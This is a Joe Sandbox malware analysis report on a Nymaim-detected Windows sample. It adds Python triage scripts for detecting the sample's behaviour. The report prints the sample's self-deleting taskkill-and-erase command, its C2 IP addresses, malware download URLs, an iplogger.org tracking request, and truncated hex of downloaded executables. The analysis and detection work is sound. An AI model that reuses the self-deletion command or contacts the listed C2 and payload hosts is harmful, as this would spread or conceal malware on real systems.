Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 715158
MD5: 526fde9e61b1b4835885973331fa1616
SHA1: ebbb0c3586b8a0244585eacb44ca125ac933ad8e
SHA256: 093741e4079a8092ba9d94653cb4f11c15fbe1e9ef53690e91628c61f0cc9440
Tags: exe

Detection

Nymaim
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Nymaim
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Binary is likely a compiled AutoIt script file
Machine Learning detection for sample
May check the online IP address of the machine
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Downloads executable code via HTTP
Enables debug privileges
Drops files with a non-matching file extension (content does not match file extension)
Sample file is different than original file name gathered from version info
Drops PE files
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Uses taskkill to terminate processes
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • file.exe (PID: 3196 cmdline: C:\Users\user\Desktop\file.exe MD5: 526FDE9E61B1B4835885973331FA1616)
    • WerFault.exe (PID: 4088 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 528 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 1364 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 700 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6080 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 724 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6064 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 760 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5216 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 768 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 4072 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 848 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 2008 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 840 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6036 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 1032 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5204 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 1292 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • cmd.exe (PID: 5760 cmdline: C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • Cleaner.exe (PID: 5208 cmdline: "C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe" MD5: 04514BD4962F7D60679434E0EBE49184)
    • WerFault.exe (PID: 3608 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 1552 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • cmd.exe (PID: 1388 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • taskkill.exe (PID: 2324 cmdline: taskkill /im "file.exe" /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
  • cleanup
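The tree above records three behaviours that are worth turning into detection logic rather than reading by eye: file.exe spawns a cmd.exe that kills and erases its own parent (the taskkill/erase line), a second cmd.exe starts a payload dropped under a random directory in %TEMP%, and WerFault.exe is launched ten times for the same crashing PID 3196. The script below is an added example and is not part of the Joe Sandbox report or its tooling; the PIDs, images and command lines are copied from the tree, while the function names, regular expressions and the crash-loop threshold are this example's own choices.

```python
"""Triage of the report's process tree for the three behaviours it records:
a cmd.exe that kills and erases its own parent (self-deletion), a cmd.exe that
starts a payload dropped under %TEMP%, and WerFault.exe being launched over
and over for one crashing process.

Added example, not part of the Joe Sandbox report or its tooling.  The pids,
images and command lines are copied from the report's process tree; the
function names, regexes and the crash-loop threshold are this example's own.
"""
import re
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str       # full path of the executable
    cmdline: str


TREE = [
    Proc(3196, 0, r"C:\Users\user\Desktop\file.exe", r"C:\Users\user\Desktop\file.exe"),
    *[Proc(pid, 3196, r"C:\Windows\SysWOW64\WerFault.exe",
           rf"C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s {s}")
      for pid, s in [(4088, 528), (1364, 700), (6080, 724), (6064, 760), (5216, 768),
                     (4072, 848), (2008, 840), (6036, 1032), (5204, 1292), (3608, 1552)]],
    Proc(5760, 3196, r"C:\Windows\System32\cmd.exe",
         r'C:\Windows\System32\cmd.exe" /c start /I "" '
         r'"C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe'),
    Proc(5208, 5760, r"C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe",
         r'"C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe"'),
    Proc(1388, 3196, r"C:\Windows\System32\cmd.exe",
         r'"C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f '
         r'& erase "C:\Users\user\Desktop\file.exe" & exit'),
    Proc(2324, 1388, r"C:\Windows\System32\taskkill.exe", r'taskkill /im "file.exe" /f'),
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def self_delete_commands(tree):
    """cmd.exe children whose command line kills the parent's image name AND
    erases the parent's full path.  Returns [(cmd_pid, parent_pid), ...]."""
    by_pid = {p.pid: p for p in tree}
    hits = []
    for p in tree:
        if basename(p.image) != "cmd.exe" or p.ppid not in by_pid:
            continue
        parent = by_pid[p.ppid]
        low = p.cmdline.lower()
        kills_parent = re.search(r'taskkill\s+/im\s+"?' + re.escape(basename(parent.image)), low)
        erases_parent = re.search(r'\b(erase|del)\b[^&]*' + re.escape(parent.image.lower()), low)
        if kills_parent and erases_parent:
            hits.append((p.pid, parent.pid))
    return hits


def temp_payload_launches(tree):
    """cmd.exe 'start' of an executable sitting under <user>\\AppData\\Local\\Temp."""
    pat = re.compile(r'\bstart\b.*?([a-z]:\\users\\[^"]*?\\appdata\\local\\temp\\[^"]+?\.exe)', re.I)
    hits = []
    for p in tree:
        if basename(p.image) == "cmd.exe":
            m = pat.search(p.cmdline)
            if m:
                hits.append((p.pid, m.group(1)))
    return hits


def werfault_crash_loops(tree, threshold=3):
    """Target pids (-p <pid>) that WerFault.exe was started for at least `threshold` times."""
    counts = Counter()
    for p in tree:
        if basename(p.image) == "werfault.exe":
            m = re.search(r"-p\s+(\d+)", p.cmdline)
            if m:
                counts[int(m.group(1))] += 1
    return {pid: n for pid, n in counts.items() if n >= threshold}


def triage(tree):
    return {
        "self_delete": self_delete_commands(tree),
        "temp_launch": temp_payload_launches(tree),
        "crash_loops": werfault_crash_loops(tree),
    }


if __name__ == "__main__":
    for name, result in triage(TREE).items():
        print(name, result)
```

The self-deletion check deliberately requires both halves (taskkill of the parent's image name and erase of the parent's full path) so that ordinary installers that delete a temp file do not trigger it; the crash-loop count is a useful secondary signal here because the repeated WerFault launches line up with the "One or more processes crash" and "Sample execution stops while process was sleeping" signatures above.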
Malware Configuration

Threatname: Nymaim
{"C2 addresses": ["208.67.104.97", "85.31.46.167"]}
Yara Overview

Memory dumps (Source; Rule; Description; Author; Strings), 5 of 60 entries shown:
00000000.00000000.309205181.00000000021C0000.00000040.00001000.00020000.00000000.sdmp; JoeSecurity_Nymaim; Yara detected Nymaim; Joe Security
00000000.00000000.309205181.00000000021C0000.00000040.00001000.00020000.00000000.sdmp; Windows_Trojan_Smokeloader_3687686f; unknown; unknown; 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000000.324269337.00000000021C0000.00000040.00001000.00020000.00000000.sdmp; JoeSecurity_Nymaim; Yara detected Nymaim; Joe Security
00000000.00000000.324269337.00000000021C0000.00000040.00001000.00020000.00000000.sdmp; Windows_Trojan_Smokeloader_3687686f; unknown; unknown; 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000000.303645653.00000000021C0000.00000040.00001000.00020000.00000000.sdmp; JoeSecurity_Nymaim; Yara detected Nymaim; Joe Security

Unpacked PE files (Source; Rule; Description; Author), 5 of 62 entries shown:
0.0.file.exe.400000.5.unpack; JoeSecurity_Nymaim; Yara detected Nymaim; Joe Security
0.0.file.exe.21c0e67.20.raw.unpack; JoeSecurity_Nymaim; Yara detected Nymaim; Joe Security
0.0.file.exe.21c0e67.26.raw.unpack; JoeSecurity_Nymaim; Yara detected Nymaim; Joe Security
0.0.file.exe.400000.23.unpack; JoeSecurity_Nymaim; Yara detected Nymaim; Joe Security
0.0.file.exe.21c0e67.14.raw.unpack; JoeSecurity_Nymaim; Yara detected Nymaim; Joe Security

Note on the Smokeloader match: the only string reported for Windows_Trojan_Smokeloader_3687686f, $a, is ordinary 32-bit PE-header-walking code (8B 40 3C loads e_lfanew from the image base held in eax, 8D 44 01 04 then forms base + e_lfanew + 4, the start of the COFF file header), so a single overlapping string in the same 0x21C0000 region is weak evidence of a second family. The Nymaim classification rests on the JoeSecurity_Nymaim rule hits and on the extracted Nymaim configuration, not on this string.

No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte; URL Reputation: Label: malware
Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte; URL Reputation: Label: malware
Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&subst; URL Reputation: Label: malware
Source: http://171.22.30.106/library.php; URL Reputation: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\soft[1]; ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe; ReversingLabs: Detection: 28%
Source: file.exe; Joe Sandbox ML: detected
Source: 00000000.00000000.309205181.00000000021C0000.00000040.00001000.00020000.00000000.sdmp; Malware Configuration Extractor: Nymaim {"C2 addresses": ["208.67.104.97", "85.31.46.167"]}
Source: file.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe; File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown; HTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.5:49701 version: TLS 1.2
Source: Binary string: ^\C:\car.pdb source: file.exe
Source: Binary string: C:\car.pdb source: file.exe

Networking

Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe; DNS query: name: iplogger.org
Source: Malware configuration extractor; IPs: 208.67.104.97
Source: Malware configuration extractor; IPs: 85.31.46.167
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View; IP Address: 148.251.234.83
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 200 OK
  Date: Mon, 03 Oct 2022 15:29:59 GMT
  Server: Apache/2.4.41 (Ubuntu)
  Pragma: public
  Expires: 0
  Cache-Control: must-revalidate, post-check=0, pre-check=0
  Cache-Control: private
  Content-Disposition: attachment; filename="dll";
  Content-Transfer-Encoding: binary
  Content-Length: 242176
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: application/octet-stream
  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 
  00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 200 OK
  Date: Mon, 03 Oct 2022 15:29:59 GMT
  Server: Apache/2.4.41 (Ubuntu)
  Pragma: public
  Expires: 0
  Cache-Control: must-revalidate, post-check=0, pre-check=0
  Cache-Control: private
  Content-Disposition: attachment; filename="soft";
  Content-Transfer-Encoding: binary
  Content-Length: 3947920
  Keep-Alive: timeout=5, max=99
  Connection: Keep-Alive
  Content-Type: application/octet-stream
  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f1 9a e4 ea 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 e4 14 00 00 0c 00 00 00 00 00 00 a6 02 15 00 00 20 00 00 00 20 15 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 15 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 02 15 00 4f 00 00 00 00 20 15 00 32 09 00 00 00 00 00 00 00 00 00 00 00 28 3c 00 90 15 00 00 00 40 15 00 0c 00 00 00 38 02 15 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac e2 14 00 00 20 00 00 00 e4 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 32 09 00 00 00 20 15 00 00 0a 00 00 00 e6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 15 00 00 02 00 00 00 f0 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 02 15 00 
  00 00 00 00 48 00 00 00 02 00 05 00 68 81 00 00 40 45 00 00 01 00 00 00 54 00 00 06 a8 c6 00 00 90 3b 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2
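Both responses above hand back a PE image (the body starts with 4d 5a, "MZ") as a generic application/octet-stream attachment whose filename ("dll", "soft") carries no executable extension; this is what the "Downloads executable code via HTTP" and "Drops files with a non-matching file extension" signatures are keyed on, and the 3947920-byte "soft" body is the file later seen as soft[1] in the IE cache and as Cleaner.exe. The script below is an added example, not part of the Joe Sandbox report or its tooling: it takes the response headers and the first 0x98 bytes of each body exactly as printed in the two entries above (the DOS header and stub are identical in both), parses the PE signature, COFF header and the start of the optional header, and emits the checks a reviewer would want. The heuristics, thresholds and function names are this example's own.

```python
"""Check the two executables the sample downloaded over HTTP (the "dll" and
"soft" responses in the report): parse the PE header of the body and flag
what a reviewer would want flagged.

Added example, not part of the Joe Sandbox report or its tooling.  Response
headers and the leading 0x98 bytes of each body are copied from the report;
the heuristics and names are this example's own.
"""
import struct
from datetime import datetime, timedelta, timezone
from email.utils import parsedate_to_datetime

# DOS header and stub (first 0x80 bytes), identical in both responses.
DOS_PREFIX = bytes.fromhex(
    "4d5a90000300000004000000ffff0000"
    "b8000000000000004000000000000000"
    "00000000000000000000000000000000"
    "00000000000000000000000080000000"   # e_lfanew = 0x80 at offset 0x3c
    "0e1fba0e00b409cd21b8014ccd215468"
    "69732070726f6772616d2063616e6e6f"
    "742062652072756e20696e20444f5320"
    "6d6f64652e0d0d0a2400000000000000"
)

DOWNLOADS = {
    "dll": {
        "headers": {"Date": "Mon, 03 Oct 2022 15:29:59 GMT",
                    "Content-Type": "application/octet-stream",
                    "Content-Disposition": 'attachment; filename="dll";',
                    "Content-Length": "242176"},
        # PE signature, 20-byte COFF header, optional-header magic + linker version
        "body": DOS_PREFIX + bytes.fromhex(
            "504500004c0103004a6cef580000000000000000e00002210b010b00"),
    },
    "soft": {
        "headers": {"Date": "Mon, 03 Oct 2022 15:29:59 GMT",
                    "Content-Type": "application/octet-stream",
                    "Content-Disposition": 'attachment; filename="soft";',
                    "Content-Length": "3947920"},
        "body": DOS_PREFIX + bytes.fromhex(
            "504500004c010300f19ae4ea0000000000000000e00022000b013000"),
    },
}

IMAGE_FILE_DLL = 0x2000
EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def parse_pe_header(body):
    """COFF header fields plus optional-header magic and linker version."""
    if body[:2] != b"MZ":
        raise ValueError("body does not start with MZ")
    e_lfanew = struct.unpack_from("<I", body, 0x3C)[0]
    if body[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    machine, nsections, stamp, _symtab, _nsyms, _optsize, chars = struct.unpack_from(
        "<HHIIIHH", body, e_lfanew + 4)
    magic, linker_major, linker_minor = struct.unpack_from("<HBB", body, e_lfanew + 24)
    return {
        "machine": machine,
        "sections": nsections,
        # EPOCH + timedelta avoids the platform range limits of fromtimestamp()
        "timestamp": EPOCH + timedelta(seconds=stamp),
        "characteristics": chars,
        "pe32plus": magic == 0x20B,
        "linker": f"{linker_major}.{linker_minor}",
    }


def filename_from_disposition(value):
    for part in value.split(";"):
        part = part.strip()
        if part.lower().startswith("filename="):
            return part[len("filename="):].strip('"')
    return ""


def assess(headers, body):
    """Findings a reviewer would want on a downloaded executable."""
    findings = []
    hdr = parse_pe_header(body)          # raises if the body is not a PE image
    name = filename_from_disposition(headers.get("Content-Disposition", ""))
    if not name.lower().endswith((".exe", ".dll")):
        findings.append(f"PE image served as generic attachment {name!r} "
                        f"({headers.get('Content-Type')})")
    if hdr["characteristics"] & IMAGE_FILE_DLL:
        findings.append("image is a DLL")
    served = parsedate_to_datetime(headers["Date"])
    if hdr["timestamp"] > served:
        findings.append(f"link timestamp {hdr['timestamp']:%Y-%m-%d} is after the HTTP Date header")
    if hdr["linker"] == "48.0":
        findings.append("linker 48.0, the value the Roslyn C#/VB compiler writes (.NET assembly)")
    return findings


if __name__ == "__main__":
    for name, dl in DOWNLOADS.items():
        print(name, parse_pe_header(dl["body"]))
        for finding in assess(dl["headers"], dl["body"]):
            print("  -", finding)
```

On the bytes shown in the report this yields: "dll" is a PE32 DLL (Characteristics 0x2102) linked in April 2017 with linker 11.0; "soft" is a PE32 executable with Characteristics 0x0022 (no 32BIT_MACHINE flag, so AnyCPU, consistent with Cleaner.exe later running with 64-bit addresses in its memory dumps) whose link timestamp decodes to the year 2094, i.e. it is not a real build time, and whose linker version 48.0 marks it as Roslyn output. Treat the timestamp finding as "not a wall-clock value" rather than as evidence of tampering: deterministic .NET builds routinely write a hash into that field.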
Source: global traffic; HTTP traffic detected:
  GET /1Pz8p7 HTTP/1.1
  User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G973U Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36
  Host: iplogger.org
  Connection: Keep-Alive
Source: unknown; Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown; TCP traffic detected without corresponding DNS query: 208.67.104.97 (4 connections)
Source: unknown; TCP traffic detected without corresponding DNS query: 85.31.46.167 (46 connections)
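Two of the network observations above are worth encoding as checks rather than reading off the list: every connection to 208.67.104.97 and 85.31.46.167 was made without a preceding DNS lookup, and both addresses are exactly the C2 list pulled from the Nymaim configuration, whereas the one destination that was resolved (iplogger.org) is contacted with a browser User-Agent claiming Android 9 from a Windows 10 sandbox. The script below is an added example, not part of the Joe Sandbox report: the destination IPs, connection counts, C2 list and request line are copied from the report, while the DNS answer for iplogger.org (the report shows the query and a TLS session to 148.251.234.83, not the answer itself) and the host OS label are assumptions, as are the function names.

```python
"""Network triage over the report's traffic: TCP destinations that no DNS
answer ever pointed at, cross-checked against the extracted Nymaim C2 list,
plus a platform check on the User-Agent of the iplogger.org request.

Added example, not part of the Joe Sandbox report.  Destination IPs,
connection counts, the C2 list and the request line are copied from the
report.  The DNS answer for iplogger.org and the host OS are assumptions.
"""

CONFIG_C2 = ["208.67.104.97", "85.31.46.167"]            # extracted Nymaim config

# (dst_ip, connections) as counted in the report's network section
CONNECTIONS = [("208.67.104.97", 4), ("85.31.46.167", 46), ("148.251.234.83", 1)]

DNS_ANSWERS = {"iplogger.org": {"148.251.234.83"}}        # ASSUMED resolution

REQUEST = ("GET /1Pz8p7 HTTP/1.1\r\n"
           "User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G973U Build/PPR1.180610.011) "
           "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36\r\n"
           "Host: iplogger.org\r\n"
           "Connection: Keep-Alive\r\n\r\n")


def dnsless_destinations(connections, dns_answers):
    """Destinations contacted without any DNS answer naming them: {ip: count}."""
    resolved = set()
    for answers in dns_answers.values():
        resolved |= set(answers)
    return {ip: n for ip, n in connections if ip not in resolved}


def c2_overlap(dnsless, config_c2):
    """Hard-coded destinations that the extracted config also lists as C2."""
    return sorted(set(dnsless) & set(config_c2))


def parse_request(raw):
    """Split a raw HTTP request into (method, path, {lower-case header: value})."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return method, path, headers


# Substrings that identify the platform a browser User-Agent claims.
UA_PLATFORMS = [("android", "Android"), ("iphone", "iOS"), ("ipad", "iOS"),
                ("windows nt", "Windows"), ("macintosh", "macOS"), ("x11; linux", "Linux")]


def ua_platform(user_agent):
    low = user_agent.lower()
    for needle, name in UA_PLATFORMS:
        if needle in low:
            return name
    return "unknown"


def ua_mismatch(raw_request, host_os):
    """The platform the User-Agent claims, if it contradicts the real host OS, else None."""
    _method, _path, headers = parse_request(raw_request)
    claimed = ua_platform(headers.get("user-agent", ""))
    return claimed if claimed not in (host_os, "unknown") else None


if __name__ == "__main__":
    dnsless = dnsless_destinations(CONNECTIONS, DNS_ANSWERS)
    print("no DNS:", dnsless)
    print("matches extracted C2:", c2_overlap(dnsless, CONFIG_C2))
    print("UA platform mismatch:", ua_mismatch(REQUEST, "Windows"))   # host OS ASSUMED
```

In production the same join runs over Zeek conn and dns logs (or Sysmon events 3 and 22) keyed by host and time window; the point of cross-checking against the extracted configuration is that a DNS-less destination confirmed by the sample's own config can be blocked with far more confidence than either signal alone, while the User-Agent check only flags the request for a look, since a legitimate desktop application may well send a mobile string.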
Source: file.exe, 00000000.00000000.352480046.000000000019B000.00000004.00000010.00020000.00000000.sdmp; String found in binary or memory: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&subst
Source: Cleaner.exe, 00000016.00000002.574678173.000001CFE5BF0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://fontfabrik.com
Source: Cleaner.exe, 00000016.00000002.565434475.000001CFC95D8000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://iplogger.org
